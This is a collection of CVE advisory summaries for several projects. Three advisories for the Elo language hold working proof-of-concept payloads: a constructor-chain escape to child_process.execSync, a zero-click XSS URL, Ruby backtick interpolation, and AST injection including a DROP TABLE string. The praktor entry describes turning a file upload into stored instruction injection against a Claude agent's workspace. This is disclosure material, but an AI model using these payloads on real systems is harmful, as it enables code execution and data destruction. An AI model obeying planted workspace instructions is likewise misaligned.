CVE-2026-44267CRITICAL9.8

### Summary An unauthenticated attacker who controls a string passed to any Elo JavaScript-emission path — `defaultFormats.elo.parse()`, the `bin/elo` CLI, or the live browser playground at `elo-lang.org/try` — can execute arbitrary code in the host JavaScript runtime. A payload built from the `.constructor.constructor` chain compiles, without modification, to a live `Function` invocation in the emitted JavaScript, escaping any sandbox assumption around "Elo is a safe data/DSL language." ### Vulnerable sink and root cause Three interacting sites in `src/` produce the bug at commit `749af7b`: 1. **`src/transform.ts:144–158`** — the `member_access` handler allows access on types `any`, `object`, or `array` without filtering the property name. This is the only place an integrator could have plugged a denylist. 2. **`src/compilers/javascript.ts:210`** — the JS emitter writes `${objectExpr}.${ir.property}` verbatim into the output, so any property name that survives the transform step flows unescaped into emitted JavaScript. 3. **`src/parser.ts:163–170, 748–750`** — the parser accepts `constructor` (and other JS meta-property names) as an ordinary identifier, so `.constructor` clears type-checking without triggering any warning. Combined, the Elo expression `({}).constructor.constructor('…')()` compiles to a live `Function('…')()` call in the emitted JS, executing in the realm of whichever sink runs the compiled code. ### Attack surfaces All three surfaces share the same root cause (no denylist in `transform.ts`) and are addressed by the same one-file patch: | # | Entry point | Threat model | |---|---|---| | 1 | Browser playground — `https://elo-lang.org/try/?code=…&run=1` | **0-click XSS / account takeover** against elo-lang.org. `?run=1` triggers `setTimeout(() => this.run(), 100)` in `playground_controller.ts:531`; the server issues a 301 that preserves `?code=`. Any shared URL that contains a payload compromises the visitor's session on elo-lang.org. | | 2 | `bin/elo` CLI | **RCE on CI / DevOps hosts.** Both `node bin/elo payload.elo` and `node bin/elo -e "_" -d @payload.elo -f elo` fire. The `-f elo` path is especially severe: the flag exists to pass user-supplied files as *data* into an Elo pipeline. No integrator expects a data-format flag to shell out to `/usr/bin/id`. | | 3 | Library API — `defaultFormats.elo.parse()` | **Node.js RCE for any downstream integrator** using Elo as a rule engine, configuration DSL, or form builder DSL (the primary documented use cases). | ### Proof of Concept **Common payload (works on all three entry points):** ```elo ({}).constructor.constructor('return this.constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\').toString()')() ``` **Library API** — `poc-minimal.js`: ```js // npm install elo const { defaultFormats } = require('elo'); const payload = "({}).constructor.constructor('return this.constructor.constructor(\\'return process\\')().mainModule.require(\\'child_process\\').execSync(\\'id\\').toString()')()"; console.log(defaultFormats.elo.parse(payload)); // → uid=1000(ultrasupara) gid=1000(ultrasupara) groups=… ``` **CLI** — `poc-cli.sh`: ```sh node bin/elo payload.elo # uid=1000(ultrasupara)… node bin/elo -e "_" -d @payload.elo -f elo # uid=1000(ultrasupara)… ``` **Browser playground** — 0-click XSS URL: ``` https://elo-lang.org/try/?code=%28%7B%7D%29.constructor.constructor%28%27alert%28document.domain%29%27%29%28%29&run=1 ``` Opening this URL causes `alert(document.domain)` to fire automatically after ~100 ms with no user interaction beyond navigating to the link. The 301 redirect preserves the `?code=` parameter intact. End-to-end execution on the live production site was captured in a screen recording attached to the original report. ### Independence from GHSA #3 (AST-API injection) This finding is independent of the Medium-severity AST-API report (GHSA #3). That fix's identifier regex `^[a-zA-Z_][a-zA-Z0-9_]*$` happens to accept `constructor`, and its threat model requires an attacker-controlled AST *object* rather than a plain string. The current finding requires only a plain Elo string, which is a strictly weaker attacker model.

CVE-2026-98058MEDIUM5.5EPSS 10%Analyzed

In the Linux kernel, the following vulnerability has been resolved: bpf: Mark syscall helpers as sleepable bpf_sys_bpf() executes the bpf(2) syscall body, which can take mutexes, allocate with GFP_KERNEL, and wait for an RCU grace period. bpf_sys_close() reaches close_fd() and filp_close(), which can sleep as well. Both helpers are limited to BPF_PROG_TYPE_SYSCALL, whose main program is sleepable. That does not make every callback sleepable: a syscall program can register a bpf_timer callback, and the verifier checks that callback in a non-sleepable context while retaining the syscall helper set. Without .might_sleep on the prototypes, such a callback can invoke bpf_sys_bpf() from hrtimer softirq context and trigger a scheduling-while-atomic failure. bpf_sys_close() is exposed through the same missing context check. Set .might_sleep on both prototypes so the existing helper-context check rejects them from timer callbacks and other atomic regions. Calls from the sleepable main body remain valid.

Use after free in Windows Security App allows an authorized attacker to elevate privileges locally.

CVE-2026-44266CRITICAL9.8

### Summary Elo's Ruby backend emits attacker-controlled text into Ruby double-quoted strings without escaping the `#` character. Because `#` begins Ruby's interpolation sequences — `#{expr}`, `#@ivar`, `#@@cvar`, `#$gvar` — and any expression wrapped in `#{...}` may use backticks for shell execution, an Elo program that contains a crafted string literal or a labelled subtype constraint compiles to Ruby that evaluates attacker-chosen Ruby, and through backticks runs attacker-chosen shell commands, at runtime. The same Elo source compiled to JavaScript, Python, or SQL is benign, so the bug also breaks the cross-target portability guarantee the rest of the compiler honours. ### Vulnerable sinks Two sinks exist in `src/compilers/ruby.ts` at commit `749af7b`: 1. **String-literal emitter — lines 180–184.** The emitter escapes backslash, double quote, and control characters, but not `#`. Any `#{...}` sequence in an Elo string literal flows straight into the emitted Ruby source. 2. **Labelled subtype-constraint branch — lines 405–412.** The error message passed to `p_fail(p, "...")` is wrapped in a Ruby double-quoted string with no escape pass at all. Because the parser at `src/parser.ts:1339–1348` accepts single-quoted Elo strings as constraint labels, a label such as `'#{` `` `id` `` `}'` flows unchanged into the emitted Ruby. ### Attack surfaces All three surfaces share the same root cause (the missing `#` escape in the Ruby double-quoted-string emission path) and are addressed by the same patch: | # | Entry point | Threat model | |---|---|---| | 1 | `/try` playground on elo-lang.org (Ruby target) | 0-click server-side RCE against elo-lang.org infrastructure from a shared PoC URL | | 2 | `bin/eloc -t ruby -x` on a CI or DevOps host | RCE on any host that passes Elo strings through the CLI | | 3 | Library API — `defaultFormats.elo.parse()` with a Ruby emission step | Ruby RCE for any downstream integrator using Elo as a rule engine, configuration DSL, or form builder DSL (the primary documented use cases) | ### Proof of Concept **String-literal sink:** ``` # poc.elo 'RES=#{`id 2>&1`}' ``` ``` $ eloc -t ruby -x poc.elo # emitted Ruby contains: "RES=#{`id 2>&1`}" # running it returns the output of id(1). ``` Replacing `` `id 2>&1` `` with `` `touch /tmp/pwned` `` produces a trivially observable filesystem side effect. **Subtype-constraint label sink:** ``` # poc-subtype.elo let X = Int(i | '#{`touch /tmp/pwned2`}': i > 0) in X(-1) ``` The predicate fails for `-1`, causing `p_fail(p, "#{...}")` to interpolate and execute the backtick command at the Ruby layer. Both flows are automated in the reproduction script submitted with the original report and were verified against Ruby 3.x. ### Root cause The Ruby-emitter's double-quoted-string escape routine omitted `#` from its character set, and one emission path (the subtype-constraint label branch) performed no escape pass at all.

CVE-2026-44265HIGH7.4

### Summary Elo's programmatic AST API accepts arbitrary values in many node fields without runtime type or syntax validation. Each backend's emit stage interpolates those values straight into the generated source with no escape pass. An integrator that populates the AST from JSON-deserialised input, plugin output, or any other untyped source therefore exposes a code-injection primitive that flows through to the emitted JavaScript, Ruby, Python, or SQL. The same pattern was previously addressed in **0.9.7 (2026-01-27)**, which patched the date/datetime/duration literal emitters via `JSON.stringify()` after a report by **naoyashiga**. This advisory generalises that fix to the remaining AST surface — at least 23 emission sites across six node-field categories and four backends. ### Vulnerable sinks Each row is a category of sinks that share the same shape: TypeScript signature erased at runtime → AST-API consumer passes a crafted value → emit interpolates the value verbatim. | # | AST field | Affected backends | Resulting injection | |---|---|---|---| | 1 | `int_literal` / `float_literal` `.value` | JS, Ruby, Python, SQL | Arbitrary expression in the emitted numeric position (RCE on JS/Ruby/Python; SQL expression injection) | | 2 | `variable.name` | JS, Ruby, Python, SQL | Identifier-position injection; on SQL, raw SQL injection because undefined identifiers are intentionally emitted as column references | | 3 | `member_access.property` | JS, Ruby, Python, SQL | Property access escaped into expression (RCE) | | 4 | `object_literal` key | JS, Ruby, SQL | Computed-key / extra-property injection (RCE on JS/Ruby; SQL injection) | | 5 | `datapath` segment | JS, Ruby, Python, SQL | Ruby symbol-list injection allows backtick shell exec; SQL string-segment unquoted in single-quote context allows SQL injection | | 6 | `lambda.params[].name` | JS, Ruby, Python | Parameter-list structural injection (RCE) | | 7 | SQL `let` binding `name` | SQL | Identifier injection in `… AS <name>` clause | ### Proof of Concept End-to-end execution was verified at commit `749af7b` for representative cases per backend. Examples: **Numeric literal injection (all four backends).** Feeding the following AST through `compileToJavaScript` emits a live `console.log` on call: ```js { type: 'literal', value: "(console.log('PWN_INT_JS'),1)" } // emits: (function(_) { return (console.log('PWN_INT_JS'),1); })(null); ``` The same AST against Ruby with `"(system('touch /tmp/pwn_int_ruby'); 1)"` creates the file; Python with `"(print('PWN_INT_PY') or 1)"` prints the sentinel; SQL emits the raw string into the numeric position. **SQL `variable.name` injection:** ```js { type: 'variable', name: "1; DROP TABLE users; --" } // emits: 1; DROP TABLE users; -- ``` **Ruby `datapath` segment shell-exec:** ```js { type: 'datapath', segments: ["a, system(`touch /tmp/pwn_dp_ruby`)"] } // emits: [:a, system(`touch /tmp/pwn_dp_ruby`)] ``` All ten end-to-end cases are automated in the `ast-exec.js` / `ast-exec2.js` scripts attached to the original report; each `console.log` and sentinel file was observed. ### Independence from GHSA #2 This finding is independent of **GHSA #2** (the `.constructor.constructor` sandbox escape). That report covers payloads delivered as plain Elo *strings* through the parser; the present advisory covers payloads delivered as AST *objects* through the programmatic API. The two threat models do not overlap: GHSA #2's identifier regex `^[a-zA-Z_][a-zA-Z0-9_]*$` accepts `constructor` (and is the right behaviour for a parser), while the present advisory adds runtime validation at every backend emit site so that AST-API consumers cannot inject arbitrary text into emitted source.

The example example_xcom that was included in airflow documentation implemented unsafe pattern of reading value from xcom in the way that could be exploited to allow UI user who had access to modify XComs to perform arbitrary execution of code on the worker. Since the UI users are already highly trusted, this is a Low severity vulnerability. It does not affect Airflow release - example_dags are not supposed to be enabled in production environment, however users following the example could replicate the bad pattern. Documentation of Airflow 3.2.0 contains version of the example with improved resiliance for that case. Users who followed that pattern are advised to adjust their implementations accordingly.

CVE-2026-62331HIGH8.2EPSS 56%Deferred

praktor is a multi-agent Claude Code orchestrator with Telegram input and output, Docker isolation, and a Mission Control UI. Prior to 0.9.1, both Telegram upload sites in `internal/telegram/bot.go` concatenate the attacker-controlled document filename into a destination path without sanitization, and `path.Join` collapses parent-directory traversal. A remote Telegram user who can message the bot can therefore write outside `uploads/` within the persistent agent workspace mounted at `/workspace/agent`. Because `allow_from: []` permits all senders by default, no prior authentication or privilege is required in that configuration. The attacker can plant or overwrite `CLAUDE.md`, instruction, skill, hook, or configuration files that the Claude agent reads and operates on across later runs, turning a document upload into stored instruction injection. The demonstrated arbitrary-write scope is the persistent agent workspace volume, not an unrestricted host-filesystem write. This issue is fixed in version 0.9.1.

WeGIA is a web manager for charitable institutions. Prior to 3.8.7, a stored cross-site scripting vulnerability in `saude/historico_prontuarios.php` arises because the `textoProntuario` field accepts arbitrary HTML or JavaScript without proper sanitization. An attacker able to create or access a patient's medical record can submit the field through `POST /controle/control.php` with `nomeClasse=SaudeControle`, `metodo=alterarProntuario`, and `id_fichamedica`. The stored content is rendered when another user accesses `/html/saude/historico_prontuarios.php` with `id_historico`, automatically executing attacker-controlled JavaScript in the victim's browser. The vulnerability permits session cookie theft and potential account compromise depending on the victim's privileges. This issue is fixed in version 3.8.7.

CVE-2026-61654NONEEPSS 32%Deferred

Lightdash is an open source business intelligence platform. In affected versions through 0.3213.0, the dbt Cloud webhook `POST /api/v1/projects/{projectUuid}/dbt-cloud/webhook` has no authentication middleware or signature validation. In `packages/backend/src/controllers/projectController.ts`, `testWebhook()` accepts `accountId` and `runId` from a `job.run.completed` request and passes them to `createPreviewWithExplores()` in `packages/backend/src/services/ProjectService/ProjectService.ts`. These unsanitized values are interpolated into the server-side dbt Cloud API URL, which is requested with the victim project's API key in the `Authorization` header. Path traversal through `accountId` changes the requested path on `cloud.getdbt.com` without changing its host, so the credential-bearing request reaches an attacker-influenced path on that fixed host. The advisory claims API-key theft, but the supplied evidence does not establish that the attacker can observe the `Authorization` header. The unauthenticated webhook also allows preview creation. The target must be a `dbt Cloud IDE` project and the attacker must know its `projectUuid`; the UUID is not enumerable but can be discovered in shared or multi-tenant contexts. Version 0.3214.0 fixes identifier path traversal and verifies webhook HMAC signatures only when a secret is configured; without a secret, unsigned webhooks continue to be processed.
